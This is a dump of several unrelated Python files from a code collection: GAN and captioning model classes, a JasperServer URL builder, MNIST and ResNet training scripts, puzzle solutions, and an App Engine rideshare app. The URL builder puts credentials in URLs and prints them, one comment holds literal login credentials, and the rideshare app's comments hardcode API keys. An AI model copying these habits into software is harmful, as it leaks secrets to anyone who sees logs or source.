x = self.Conv2d_3b_1x1(x)\n x = self.Conv2d_4a_3x3(x)\n x = F.max_pool2d(x, kernel_size=3, stride=2)\n x = self.Mixed_5b(x)\n x = self.Mixed_5c(x)\n x = self.Mixed_5d(x)\n x = self.Mixed_6a(x)\n x = self.Mixed_6b(x)\n x = self.Mixed_6c(x)\n x = self.Mixed_6d(x)\n x = self.Mixed_6e(x)\n\n local_features = x\n\n x = self.Mixed_7a(x)\n x = self.Mixed_7b(x)\n x = self.Mixed_7c(x)\n x = F.avg_pool2d(x, kernel_size=8)\n\n pool_features = x.view(-1, 2048)\n\n # Project features onto encoding space\n pool_features = self.linear_embed(pool_features)\n local_features = self.conv_embed(local_features).view(-1, self.encoding_size, 289)\n \n return local_features, pool_features\n\n# Networks for image generation\n\nclass ConditionalAugmentationNet(nn.Module):\n '''\n Conditional Augmentation net to sample additional examples from\n nearby the sentence encoding, done in order to overcome the sparsity\n of examples. Acts and is trained similar to a VAE.\n '''\n \n def __init__(self, encoding_size, ca_size):\n super(ConditionalAugmentationNet, self).__init__()\n \n self.encoding_size = encoding_size\n self.ca_size = ca_size\n \n self.fc = nn.Linear(self.encoding_size, self.ca_size * 4, bias=True)\n self.glu = GLU()\n\n def encode(self, sentence_embedding):\n x = self.glu(self.fc(sentence_embedding))\n mu = x[:, : self.ca_size]\n logvar = x[:, self.ca_size:]\n return mu, logvar\n\n def reparameterize(self, mu, logvar):\n epsilon = torch.randn_like(mu)\n std = torch.exp(0.5 * logvar)\n return mu + std * epsilon\n\n def forward(self, sentence_embedding):\n mu, logvar = self.encode(sentence_embedding)\n ca_encoding = self.reparameterize(mu, logvar)\n return ca_encoding, mu, logvar\n\nclass F_0(nn.Module):\n '''\n Neural network module used to produce the first coarse grained\n feature map.\n '''\n \n def __init__(self, in_channels, z_size, ca_size):\n super(F_0, self).__init__()\n\n self.in_channels = in_channels\n self.input_dim = z_size + ca_size\n\n # Initialize parameters\n self.fc = nn.Sequential(\n nn.Linear(self.input_dim, self.in_channels * 16 * 2),\n nn.BatchNorm1d(self.in_channels * 16 * 2),\n GLU())\n\n # Four upsampling layers\n upsample_blocks = []\n for i in range(4):\n curr = int(self.in_channels / (2 ** i))\n block = upBlock(curr, int(curr / 2))\n upsample_blocks.append(block)\n self.upsample_block = nn.Sequential(*upsample_blocks)\n\n def forward(self, z_noise, ca_encoding):\n # Concatenate the noise and ca_encoding\n encoding = torch.cat((ca_encoding, z_noise), 1)\n\n output = self.fc(encoding)\n output = output.view(-1, self.in_channels, 4, 4)\n return self.upsample_block(output)\n\nclass F_i(nn.Module):\n '''\n The feature extractors for the deeper layers of the generator network\n complex.\n '''\n \n def __init__(self, in_channels, width):\n super(F_i, self).__init__()\n\n # Architecture hyperparameters\n # Corresponds to D_hat in the AttnGAN paper\n self.in_channels = in_channels\n # 64 or 128\n self.width = width\n\n # Initialize parameters\n self.net = nn.Sequential(\n ResidualBlock(self.in_channels * 2),\n ResidualBlock(self.in_channels * 2),\n upBlock(self.in_channels * 2, self.in_channels))\n\n def forward(self, prev_hidden, word_contexts):\n joined_input = torch.cat((prev_hidden, word_contexts), 1)\n joined_input = joined_input.view(-1, self.in_channels * 2, \n self.width, self.width)\n return self.net(joined_input)\n\nclass F_Attn(nn.Module):\n '''\n Neural network used to compute the attention weights for each\n spatial location of an image.\n '''\n \n def __init__(self, hidden_size, encoding_size):\n super(F_Attn, self).__init__()\n\n # Architecture hyperparameters\n self.encoding_size = encoding_size\n self.hidden_size = hidden_size\n\n self.conv_projection = conv1x1(encoding_size, hidden_size)\n\n def apply_mask(self, s, mask):\n '''\n Applies a mask to words with index 0 (either\n start, end or unk. Check it.)\n '''\n bsz, N, T = s.shape\n mask = mask.repeat(N, 1).view(bsz, N, T)\n s.masked_fill_(mask, -float('inf'))\n\n def forward(self, prev_hidden, word_embedding, mask=None):\n '''\n Computes the attention context for each spatial location.\n We are assuming that both prev_hidden and word_embedding are\n flattened matrices.\n '''\n N = prev_hidden.shape[0]\n\n # We first project the word embedding vector to the hidden space\n word_embedding = self.conv_projection(word_embedding.unsqueeze(-1))\n word_embedding = word_embedding.view(N, self.hidden_size, -1)\n\n # Compute beta\n s = torch.bmm(prev_hidden.transpose(1, 2), word_embedding)\n if mask is not None:\n self.apply_mask(s, mask)\n beta = F.softmax(s, dim=2)\n beta = beta.transpose(1, 2)\n\n # Compute the context vector\n word_contexts = torch.bmm(word_embedding, beta)\n\n return word_contexts, beta\n\nclass Generator(nn.Module):\n '''\n Individual generator existing within the generator complex\n of AttnGAN and MirrorGAN producing images of varied coarseness.\n Simply applies a dimension preserving convolutional layer to the image.\n '''\n \n def __init__(self, in_channels, width):\n super(Generator, self).__init__()\n\n self.in_channels = in_channels\n self.width = width\n self.conv = conv3x3(self.in_channels, 3)\n\n def forward(self, prev_hidden):\n prev_hidden = prev_hidden.view(-1, self.in_channels, self.width,\n self.width)\n return torch.tanh(self.conv(prev_hidden))\n\nclass GeneratorComplex(nn.Module):\n '''\n The main generator network of AttnGAN and MirrorGAN (GLAM).\n '''\n \n def __init__(self, args):\n super(GeneratorComplex, self).__init__()\n self.name = \"generator_complex\"\n\n # Architecture hyperparameters\n self.encoding_size = args.encoding_size\n self.ca_size = args.ca_size\n self.in_channels = args.in_channels\n self.z_size = args.z_size\n\n # Model parameters\n # First feature extraction\n self.ca_network = ConditionalAugmentationNet(self.encoding_size, \n self.ca_size)\n self.f_0 = F_0(self.in_channels * 16, self.z_size, self.ca_size)\n self.g_1 = Generator(self.in_channels, 64)\n\n # Second feature extractor\n self.f_1_attn = F_Attn(self.in_channels, self.encoding_size)\n self.f_1 = F_i(self.in_channels, 64)\n self.g_2 = Generator(self.in_channels, 128)\n\n # Third feature extractor\n self.f_2_attn = F_Attn(self.in_channels, self.encoding_size)\n self.f_2 = F_i(self.in_channels, 128)\n self.g_3 = Generator(self.in_channels, 256)\n\n def forward(self, noise, sentence_embedding, word_embedding, mask):\n fake_images = []\n attn_masks = []\n bsz = sentence_embedding.shape[0]\n\n # Go through the first feature extractor\n ca_encoding, mu, logvar = self.ca_network(sentence_embedding)\n h_1 = self.f_0(noise, ca_encoding)\n h_1 = h_1.view(bsz, self.in_channels, -1)\n fake_images.append(self.g_1(h_1))\n\n # Go through second feature extractor\n word_context, beta = self.f_1_attn(h_1, word_embedding, mask=mask)\n h_2 = self.f_1(h_1, word_context)\n h_2 = h_2.view(bsz, self.in_channels, -1)\n fake_images.append(self.g_2(h_2))\n attn_masks.append(beta)\n\n # Go through the third feature extractor \n word_context, beta = self.f_2_attn(h_2, word_embedding, mask=mask)\n h_3 = self.f_2(h_2, word_context)\n h_3 = h_3.view(bsz, self.in_channels, -1)\n fake_images.append(self.g_3(h_3))\n attn_masks.append(beta)\n\n return fake_images, attn_masks, mu, logvar\n\nclass Discriminator(nn.Module):\n '''\n The discriminator architecture\n '''\n\n def __init__(self, args, discriminator_number):\n super(Discriminator, self).__init__()\n self.name = \"discriminator_{}\".format(discriminator_number)\n\n self.num_filters = args.discriminator_filters\n self.encoding_size = args.encoding_size\n\n # Get the downscaling layer common to all levels of coarseness\n downscale_chain = [leakyReLUBlock(self.num_filters * (2 ** i), 2 * self.num_filters * (2 ** i),\n 4, 2, 1, bias=True) for i in range(3)]\n common = nn.Sequential(\n nn.Conv2d(3, self.num_filters, 4, 2, 1, bias=True),\n nn.LeakyReLU(0.2, inplace=True),\n *downscale_chain)\n \n # Add additional downsampling layers\n if discriminator_number > 0:\n additional_downscales = [leakyReLUBlock(self.num_filters * (2 ** i), 2 * self.num_filters * (2 ** i),\n 4, 2, 1, bias=True) for i in range(3, 3 + discriminator_number)]\n preserving_convs = [leakyReLUBlock(2 * self.num_filters * (2 ** i), self.num_filters * (2 ** i))\n for i in range(2 + discriminator_number, 2, -1)]\n common = nn.Sequential(\n common,\n *additional_downscales,\n *preserving_convs)\n\n self.downsample = common\n \n # Conditional and unconditional layers\n self.conditional = nn.Sequential(\n leakyReLUBlock(self.num_filters * 8 + self.encoding_size, \n self.num_filters * 8),\n nn.Conv2d(self.num_filters * 8, 1, 4, stride=4, bias=True))\n self.unconditional = nn.Conv2d(self.num_filters * 8, 1, 4, stride=4, bias=True)\n\n def forward(self, x, sentence_encoding):\n h = self.downsample(x)\n\n # Get unconditional logits\n unconditional_logit = self.unconditional(h).view(-1)\n\n # Get conditional logits\n sentence_encoding = sentence_encoding.view(-1, self.encoding_size, 1, 1)\n sentence_encoding = sentence_encoding.repeat(1, 1, 4, 4)\n conditional_logit = self.conditional(torch.cat((h, sentence_encoding), 1)).view(-1)\n\n return unconditional_logit, conditional_logit\n\n# Image Captioning modules for MirrorGAN\n# Has been closely adapted from the original repository\n\nclass ImageCaptioningImageEncoder(nn.Module):\n '''\n A ResNet pretrained on ImageNet used to extract feature vectors \n for image captioning.\n '''\n \n def __init__(self, args):\n super(ImageCaptioningImageEncoder, self).__init__()\n self.name = \"image_captioning_image_encoder\"\n\n self.embedding_size = args.caption_embedding_size\n\n # Load a pretrained resnet from torchvision\n resnet = models.resnet152(pretrained=True) \n self.resnet = nn.Sequential(*(list(resnet.children())[:-1]))\n for param in self.resnet.parameters():\n param.requires_grad = False\n self.projection = nn.Sequential(\n nn.Linear(resnet.fc.in_features, self.embedding_size),\n nn.BatchNorm1d(self.embedding_size, momentum=0.01))\n\n def forward(self, x):\n N = x.shape[0]\n x = nn.Upsample(size=(224, 224), mode='bilinear', align_corners=True)(x)\n x = self.resnet(x).view(N, -1)\n return self.projection(x)\n\nclass ImageCaptioningLSTM(nn.Module):\n '''\n The LSTM used to caption images\n '''\n def __init__(self, args):\n super(ImageCaptioningLSTM, self).__init__()\n self.name = \"image_captioning_lstm\"\n\n # Architecture hyperparameters\n self.vocab_size = args.vocab_size\n self.embedding_size = args.caption_embedding_size\n self.hidden_size = args.caption_hidden_size\n self.num_layers = args.caption_num_layers\n self.seq_len = constants.SEQ_LENGTH\n\n # Parameter initialization\n self.embed = nn.Embedding(self.vocab_size, self.embedding_size)\n self.lstm = nn.LSTM(self.embedding_size, self.hidden_size, self.num_layers,\n batch_first=True)\n self.fc = nn.Linear(self.hidden_size, self.vocab_size)\n\n def forward(self, image_embedding, captions, cap_lens):\n embedding = self.embed(captions)\n embedding = torch.cat((image_embedding.unsqueeze(1), embedding), 1)\n packed = pack_padded_sequence(embedding, cap_lens, batch_first=True)\n hiddens, _ = self.lstm(packed)\n outputs = self.fc(hiddens[0])\n return outputs\n\n def sample(self, embedding, states=None): \n samples = []\n input_embedding = embedding.unsqueeze(1)\n for i in range(self.seq_len):\n output, hiddens = self.lstm(input_embedding, states)\n output = self.fc(output.squeeze(1))\n _, next_inputs = torch.max(output, 1)\n samples.append(next_inputs)\n input_embedding = self.embed(next_inputs)\n input_embedding = input_embedding.unsqueeze(1)\n return torch.stack(samples, 1)\n\n# For Inception scores\n\nclass InceptionNetwork(nn.Module):\n '''\n Inception-v3 model to be finetuned on CUB and used for inception\n score calculation. Implementation done with reference to\n https://pytorch.org/tutorials/beginner/finetuning_torchvision_models_tutorial.html\n '''\n\n def __init__(self):\n super(InceptionNetwork, self).__init__()\n self.name = \"inception_network\"\n \n # Load pretrained Inception-v3\n model = models.inception_v3(pretrained=True)\n for param in model.parameters():\n param.requires_grad = False\n\n # Initialize finetuning layers\n in_features = model.AuxLogits.fc.in_features\n model.AuxLogits.fc = nn.Linear(in_features, 200)\n in_features = model.fc.in_features\n model.fc = nn.Linear(in_features, 200)\n\n self.model = model\n\n def forward(self, x):\n x = nn.Upsample(size=(299, 299), mode='bilinear', align_corners=True)(x)\n return self.model(x)\n\nclass PretrainedInception(nn.Module):\n '''\n Inception-v3 model to be finetuned on CUB and used for inception\n score calculation. Implementation done with reference to\n https://pytorch.org/tutorials/beginner/finetuning_torchvision_models_tutorial.html\n '''\n\n def __init__(self):\n super(PretrainedInception, self).__init__()\n self.name = \"inception_network\"\n \n # Load pretrained Inception-v3\n model = models.inception_v3(pretrained=True)\n for param in model.parameters():\n param.requires_grad = False\n self.model = model\n\n def forward(self, x):\n x = nn.Upsample(size=(299, 299), mode='bilinear', align_corners=True)(x)\n return self.model(x)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":30032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"308434830","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\n\nfrom django.conf import settings\n\n\n# http://192.168.0.10:8080/jasperserver/flow.html?_flowId=viewReportFlow&standAlone=true&reportUnit=/Imobiliar/Relatorios/Balancete_Por_Periodo&datafin=2016-01-31&dataini=2016-01-01&j_username=alugar&j_password=consulta&decorate=no\n\ndef montaURLjasperReport(report_name, params=None):\n \"\"\"\n params:`dict`, ex: 'dataini':`datetime.datetime`(2016,5,1),'datafin':`datetime.datetime`(2016,5,31)}\n \"\"\"\n if params is None:\n params = {}\n url_string = settings.REPORT_URI + '/flow.html?_flowId=viewReportFlow&standAlone=true&reportUnit=' + report_name\n\n paramstr = ''\n if type(params) == dict:\n for k, v in params.items():\n if isinstance(v, date):\n params[k] = v.strftime(\"%Y-%m-%d\")\n else:\n params[k] = v\n p = '{0}={1}&'.format(k, v)\n paramstr += p\n else:\n raise TypeError(\"Params is not Dict Type\")\n\n login = 'j_username={0}&j_password={1}&decorate=no'.format(settings.REPORT_USERNAME, settings.REPORT_PASSWORD)\n\n url = '{0}&{1}{2}'.format(url_string, paramstr, login)\n print('URL: ' + url)\n\n return url\n","sub_path":"common/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607452090","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport mnist_loader\r\nimport network2\r\n\r\nif __name__ == \"__main__\":\r\n #先��载 MNIST 数据。\r\n training_data, validation_data, test_data = mnist_loader.load_data_wrapper()\r\n\r\n net = network2.Network([784, 30, 10], cost = network2.CrossEntropyCost)\r\n net.large_weight_initializer()\r\n\r\n net.SGD(training_data, 30, 10, 0.5, evaluation_data=test_data, monitor_evaluation_accuracy=True)\r\n\r\n","sub_path":"src/run2.py","file_name":"run2.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"495275412","text":"n = int(input())\ninnings = [list(map(int, input().split())) for _ in range(n)]\n#반복문 안에서 remove쓰면 안된다..! 길이가 줄어드는데 index는 그대로 참조하기 때문에 out of range error난다\nfrom itertools import permutations\ndef score(ord):#순서 받아서 플레이하고 점수 return\n '''\n while문을 사용해서, 선수를 계속 나누기연산으로 돌려 가면서 out이 3이 되기 전까지 계속 진행한다\n while문은 각 선수에 대해서 한번 돌고, out이 발생하면 out+1 한다\n 그 while문을 이닝 수만큼 진행 하면서 이닝 별 score를 기록한다\n '''\n s = 0\n idx = 0 #idx : idx번타자; 첫이닝은 0번타자로 시작\n for perform in innings:\n #이닝별 선수들 performance\n out = 0 #out 초기화\n b1, b2, b3 = 0, 0, 0\n while True: #out 3이면 break\n idx = idx % 9\n player = ord[idx]\n if perform[player] == 0:\n out += 1\n elif perform[player] == 1:\n s += b3\n b1, b2, b3 = 1, b1, b2\n elif perform[player] == 2:\n s += (b2 + b3)\n b1, b2, b3 = 0, 1, b1\n elif perform[player] == 3:\n s += (b1 + b2 + b3)\n b1, b2, b3 = 0, 0, 1\n elif perform[player] == 4:\n s += (b1 + b2 + b3 + 1)\n b1, b2, b3 = 0, 0, 0\n idx += 1\n if out == 3:\n break\n return s\nanswer = 0\nfor order in permutations(range(1, 9), 8):\n order = order[0:3] + (0,) + order[3:]\n answer = max(score(order), answer)\n\nprint(answer)","sub_path":"BeakjoonOJ_Solved/17281.py","file_name":"17281.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"542020218","text":"def solution(X, A):\n data = {}\n\n for i, x in enumerate(A):\n if x not in data:\n data[x] = i\n\n res = 0\n for i in range(1, X + 1):\n if i not in data:\n return -1\n res = max(data[i], res)\n\n return res\n","sub_path":"cdlt/FrogRiverOne.py","file_name":"FrogRiverOne.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558075448","text":"# python3 main script\n\"\"\"\nGeneral usage: \nOn linux: CUDA_VISIBLE_DEVICES=4 python3 train.py --i_fold 1\n\"\"\"\n\n# basic libraries\nfrom __future__ import print_function\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport os\nimport time\n\n#import tensorflow as tf\n#from keras.backend.tensorflow_backend import set_session\n#config = tf.ConfigProto()\n#config.gpu_options.per_process_gpu_memory_fraction = 0.8\n#set_session(tf.Session(config = config))\n\n### add argument parsing ###\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--i_fold\", type = str, help = \"fold number to append on model name\", default = '1')\nparser.add_argument(\"--n_gen_loop\", type = int, help = \"Validation set augment ratio (loop)\", default = 3)\n\nargs = parser.parse_args()\ni_fold = args.i_fold\n\n# NN libraries\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.models import load_model, save_model\nfrom keras.optimizers import SGD, Adam, Adagrad # gradient\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras import backend as K\nK.set_image_dim_ordering('tf')\n\n# customized functions (should under the same path)\nfrom callbacks_miscs import *\nfrom py_init_data import *\nfrom py_generator_for_model import *\n\n# there should be a config.py under the same path\nfrom config import *\nprint('Config import complete')\n\nif nn_activation == 'relu':\n ### If use default resnet\n from keras.applications.resnet50 import ResNet50\nelse:\n ### If want to modify the resnet structure\n from resnet_with_drp import *\n\nfrom keras.models import Sequential, Model, load_model, save_model\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Input\nfrom keras.layers import Convolution2D, MaxPooling2D, Conv2D, BatchNormalization\nfrom keras.layers import AveragePooling2D, ZeroPadding2D, GlobalAveragePooling2D\n\ndef resnet_model_build(resnet_model, use_stage, freeze_stage, acti,\n use_merge = False, \n n_meta = 0,\n fc_drop_rate = 0.2):\n #if use merge should always check n_meta\n \n fc_drop_rate = float(fc_drop_rate)\n for layer in resnet_model.layers:\n layer.trainable = True\n #resnet_model.summary()\n\n # design for using different activation function that will change the layer name\n if acti == 'relu':\n to_get = 'activation_'\n else:\n to_get = acti + \"_\"\n\n if use_stage == 1:\n get_layer = \"max_pooling2d\"\n elif use_stage == 2:\n #get_layer = \"activation_10\"\n get_layer = to_get + '10'\n elif use_stage == 3:\n #get_layer = \"activation_22\"\n get_layer = to_get + '22'\n elif use_stage == 4:\n #get_layer = \"activation_40\"\n get_layer = to_get + '40'\n else:\n get_layer = \"global_avg_pooling2d_1\"\n\n if freeze_stage == 1:\n free_layer_num = 5\n elif freeze_stage == 2:\n free_layer_num = 37\n elif freeze_stage == 3:\n free_layer_num = 79\n elif freeze_stage == 4:\n free_layer_num = 141\n else:\n free_layer_num = 176\n\n if freeze_stage == 0:\n print('all parameter tunable')\n else:\n for layer in resnet_model.layers[:free_layer_num]:\n layer.trainable = False\n \n if use_stage != 5: \n x = resnet_model.get_layer(get_layer).output\n #x = AveragePooling2D((13, 13), name='avg_pool')(x)\n #x = Flatten()(x)\n x = GlobalAveragePooling2D()(x)\n else:\n x = resnet_model.get_layer(get_layer).output\n \n if use_merge:\n meta_info = Input(shape = (n_meta, )) # n_meta: numbers of features from meta\n x = keras.layers.concatenate([x, meta_info])\n else:\n pass\n \n \"\"\"\n x = Dense(64, name = 'dense1')(x)\n x = BatchNormalization(axis = -1, name = 'dense1_bn')(x)\n x = Activation('relu', name = 'dense1_activation')(x)\n x = Dropout(fc_drop_rate, name = 'd1_drop')(x)\n \n x = Dense(32, name = 'dense2')(x)\n x = BatchNormalization(axis = -1, name = 'dense2_bn')(x)\n x = Activation('relu', name = 'dense2_activation')(x)\n x = Dropout(fc_drop_rate, name = 'd2_drop')(x)\n \"\"\"\n \n out = Dense(2, activation=\"softmax\", name = \"output\")(x)\n \n model_final = Model(inputs = [resnet_model.input], outputs = [out])\n return model_final\n\n\n\"\"\"\nTrain all data, cut by date\n\"\"\"\nprint('script start')\n# Define names for saved model name\nopt = model_output_prefix + '_k' + str(i_fold)\nmodel_file_name = dir_out_model + \"/model_\" + opt + \".h5\"\n\n# Initialize the data\ndata_cla = init_data_from_directory(data_params)\ntrain_nonC, val_nonC, test_nonC, train_C, val_C, test_C = data_cla.get_train_val_test_df()\nprint('Non_copper training/validation/testing ' + str(len(train_nonC)) + \"/\" + str(len(val_nonC)) + \"/\" + str(len(test_nonC)))\nprint('copper training/validation/testing ' + str(len(train_C)) + \"/\" + str(len(val_C)) + \"/\" + str(len(test_C)))\n\n# Check table independcy here (should be empty!, if not empty, it means data contamination)\nif len(set(train_C.pid).intersection(test_C.pid) ) != 0:\n print('die')\n raise 'YOU MUST ERROR HERE!'\nif len(set(train_nonC.pid).intersection(test_nonC.pid) ) != 0:\n print('die')\n raise 'YOU MUST ERROR HERE!'\n \n# Get training set mean of rgb\nif generator_params_dict['use_self_improc'] == 'dataset':\n print('use dataset mean')\n avg_dataset = get_training_set_mean(df_class0= train_C, df_class1= train_nonC, n_core=8)\n generator_params_dict['dataset_mean'] = avg_dataset / np.float32(dataset_mean_ratio)\n # write the self_mean information to a txt file\n csv_file_name = dir_out_model + \"/rgbConfig_\" + opt + \".txt\"\n np.savetxt(csv_file_name, avg_dataset)\nelse:\n generator_params_dict['dataset_mean'] = None\n print('do not use dataset mean')\n\n# Initiaalize the generator\ngen_data = call_generators(generator_params_dict, dta_gen= datagen)\nx_val, y_val = gen_data.get_validation_data(df_class0= val_nonC, df_class1= val_C,\n class_0_ratio = 1, use_im_gen = datagen_val, n_gen_loop = args.n_gen_loop)\nK.clear_session()\nif nn_activation == 'relu':\n print('use defaut activation function')\n resnet_model = ResNet50(include_top=False, weights = \"imagenet\", input_shape = (200, 200, 3), pooling ='avg')\nelse:\n print('use activation function: ' + nn_activation)\n resnet_model = ResNet50(include_top=False, weights = \"imagenet\", input_shape = (200, 200, 3), pooling ='avg', acti = nn_activation)\n\nmodel = resnet_model_build(resnet_model, freeze_stage= fs, use_stage= us, acti = nn_activation)\nif n_gpu_use > 1:\n print('use ' + str(n_gpu_use) + ' to merging')\n model = make_parallel(model, n_gpu_use)\n\nmodel.summary()\n\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=6)\nmyoptimizer = Adam(lr= lr)\nmodel.compile(loss='binary_crossentropy', optimizer=myoptimizer, metrics=['acc'])\n\nearlystop = EarlyStopping(monitor= 'val_loss', \n min_delta= 0.0001, \n patience= nb_epoch / 10, \n verbose=0, mode='auto')\n\ncheckpoint = ModelCheckpoint(model_file_name,\n monitor='val_loss',\n verbose=1,\n save_best_only=True,\n mode='auto')\nloss_history = LossHistory()\nif use_merge:\n pass\nelse:\n history_model = model.fit_generator(gen_data.train_generator(df_class0=train_nonC, \n df_class1=train_C,\n class_0_ratio = 1,\n class_1_ratio = 1,\n bz = batch_size, action = mini_batch_method),\n steps_per_epoch = n_batch,\n epochs= nb_epoch,\n validation_data=(x_val, y_val),\n callbacks = [\n reduce_lr,\n loss_history, \n checkpoint, \n earlystop,\n LogAUC(), \n f1sc()\n \n ])\n\n # save training process\ntrain_loss = history_model.history.get(\"loss\")\ntrain_acc = history_model.history.get(\"acc\")\nval_loss = history_model.history.get(\"val_loss\")\nval_acc = history_model.history.get(\"val_acc\")\nval_auc = history_model.history.get(\"val_auc\")\nval_f1 = history_model.history.get('val_f1sc')\nval_tp = np.array(history_model.history.get('val_tp')).astype('float32')\nval_tn = np.array(history_model.history.get('val_tn')).astype('float32')\nval_fp = np.array(history_model.history.get('val_fp')).astype('float32')\nval_fn = np.array(history_model.history.get('val_fn')).astype('float32')\n \npd_tmp = pd.DataFrame({'train_loss': train_loss,\n 'valid_loss': val_loss,\n 'train_acc': train_acc,\n 'valid_acc': val_acc,\n 'valid_f1': val_f1,\n 'valid_auc': val_auc,\n 'valid_TP': val_tp,\n 'valid_TN': val_tn,\n 'valid_FP': val_fp,\n 'valid_FN': val_fn})\npd_tmp.to_csv(opt + '_training_process.csv')\n# make prediction\npred_out = gen_data.model_predict_testing(model_name = model_file_name, \n df_class0 = test_nonC, \n df_class1 = test_C, \n testing_batch_size= 10000)\npred_out.to_csv(dir_out_csv + '/testing_' + opt + '.csv', index = False)\nprint('a round end')\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"211622280","text":"# This is actually the development one.\n# lutherrideshare.appspot key: ABQIAAAAg9WbCE_zwMIRW7jDFE_3ixS0LiYWImofzW4gd3oCqtkHKt0IaBT-STdq-gdH-mW2_ejMPXqxnfJjgw\n\n# This has the app id of ridesharebeta and is also on ridesharebeta.appspot.com\n# rideshare.luther.edu key: ABQIAAAAg9WbCE_zwMIRW7jDFE_3ixQ2JlMNfqnGb2qqWZtmZLchh1TSjRS0zuchuhlR8g4tlMGrjg34sNmyjQ\n#!/usr/bin/env python2.7\n\nimport webapp2\nfrom simpleauth import SimpleAuthHandler\nfrom app.base_handler import BaseHandler\n\n# testing\nfrom app.controllers.test_account import create_user\n# end testing\n\nimport app.secrets as secrets\n\nfrom app.model import *\n\napp_config = {\n 'webapp2_extras.sessions': {\n 'cookie_name': '_simpleauth_sess',\n 'secret_key': secrets.SESSION_KEY\n },\n 'webapp2_extras.auth': {\n 'user_attributes': []\n }\n}\n\nimport wsgiref.handlers\nimport datetime\nfrom datetime import date\nfrom google.appengine.api import mail\n\nimport jinja2\nfrom google.appengine.ext import db\n\nfrom app.pygeocoder import Geocoder\n\nimport logging\nimport urllib\nimport random\nimport os.path\n\nfrom app.controllers.circles import *\nfrom app.controllers.events import *\nfrom app.controllers.rides import *\nfrom app.controllers.comments import *\nfrom app.controllers.users import *\n\nfrom app.common.toolbox import doRender\n\n# Creates Community entry on first run.\naquery = db.Query(Community)\nif aquery.count() == 0:\n #development site\n community = Community(\n name = secrets.community['name'],\n address = secrets.community['address'],\n lat = secrets.community['lat'],\n lng = secrets.community['lng']\n )\n community.put()\n \nclass MapHandler(BaseHandler):\n def get(self):\n self.auth()\n user = self.current_user()\n doRender(self, 'index_rework.html', {\n 'user': user\n })\n\nclass LoginHandler(BaseHandler):\n def get(self):\n doRender(self, 'loginPage.html', {})\n\nclass HomeHandler(BaseHandler):\n def get(self):\n self.auth()\n aquery = db.Query(Community)\n community = aquery.get()\n user = self.current_user()\n\n notis = Notification.all().filter('user = ', user.key()).fetch(10)\n\n today = datetime.date.today()\n upcoming = Ride.all().filter('date > ', today).fetch(20)\n\n for up in upcoming:\n if user.key() in up.passengers:\n up.is_pass = True\n else:\n up.is_pass = False\n if user.key() == up.driver.key():\n up.is_driver = True\n else:\n up.is_driver = False\n\n doRender(self, 'home.html', { \n 'user': user,\n 'notis': notis,\n 'upcoming': upcoming\n })\n\nclass IncorrectHandler(BaseHandler):\n def get(self):\n doRender(self, 'error.html', {\n 'error_message': \"Page does not exist.\"\n })\n\nclass HelpHandler(BaseHandler):\n def get(self):\n user = self.current_user()\n\n doRender(self, 'help.html', {\n 'user': user\n })\n\nclass DetailHandler(BaseHandler):\n def get(self):\n self.auth()\n user = self.current_user()\n\n doRender(self, 'details.html', {\n 'user': user\n })\n def post(self):\n self.auth()\n json_str = self.request.body\n data = json.loads(json_str)\n\n self.auth()\n user = self.current_user()\n\n user.email = data['email']\n user.phone = data['phone']\n\n user.put()\n\n resp = {\n 'message': 'Information updated'\n }\n\n self.response.write(json.dumps(resp))\n\napp = webapp2.WSGIApplication([\n ('/', LoginHandler),\n ('/map', MapHandler),\n\n # controllers/rides.py\n ('/rides', RideHandler),\n ('/ride/(\\d+)', GetRideHandler),\n ('/join_ride', RideJoinHandler),\n (\"/newride\", NewRideHandler),\n ('/home', HomeHandler),\n # end rides\n\n # controllers/users.py\n ('/user/(\\d+)', GetUserHandler),\n ('/user/edit/(\\d+)', EditUserHandler),\n ('/user', UserHandler),\n # end users\n\n # controllers/comments.py\n ('/comment', CommentHandler),\n ('/comments', FetchComments),\n ('/comment/(\\d+)', GetComment),\n # end comments\n\n # controllers/circles.py\n ('/circle/(\\d+)', GetCircleHandler),\n ('/addCircle', AddCircleHandler),\n ('/newCircle',NewCircleHandler),\n ('/circles', CircleHandler),\n ('/join_circle', JoinCircle),\n # end circles\n\n # controllers/events.py\n ('/event/(\\d+)', GetEventHandler),\n ('/events', EventHandler),\n ('/newevent', NewEventHandler),\n # end events\n\n # auth routes\n webapp2.Route(\n '/auth/',\n handler='app.auth_handler.AuthHandler:_simple_auth',\n name='auth_login'\n ),\n webapp2.Route(\n '/auth//callback', \n handler='app.auth_handler.AuthHandler:_auth_callback',\n name='auth_callback'\n ),\n webapp2.Route(\n '/logout',\n handler='app.auth_handler.AuthHandler:logout',\n name='logout'\n ),\n ('/details', DetailHandler),\n # end auth routes\n ('/testing', create_user),\n ('/help', HelpHandler),\n ('/.*', IncorrectHandler)\n ],\n config = app_config,\n debug = True)\n\n# This is actually the development one.\n# lutherrideshare.appspot key: ABQIAAAAg9WbCE_zwMIRW7jDFE_3ixS0LiYWImofzW4gd3oCqtkHKt0IaBT-STdq-gdH-mW2_ejMPXqxnfJjgw\n\n# This has the app id of ridesharebeta and is also on ridesharebeta.appspot.com\n# rideshare.luther.edu key: 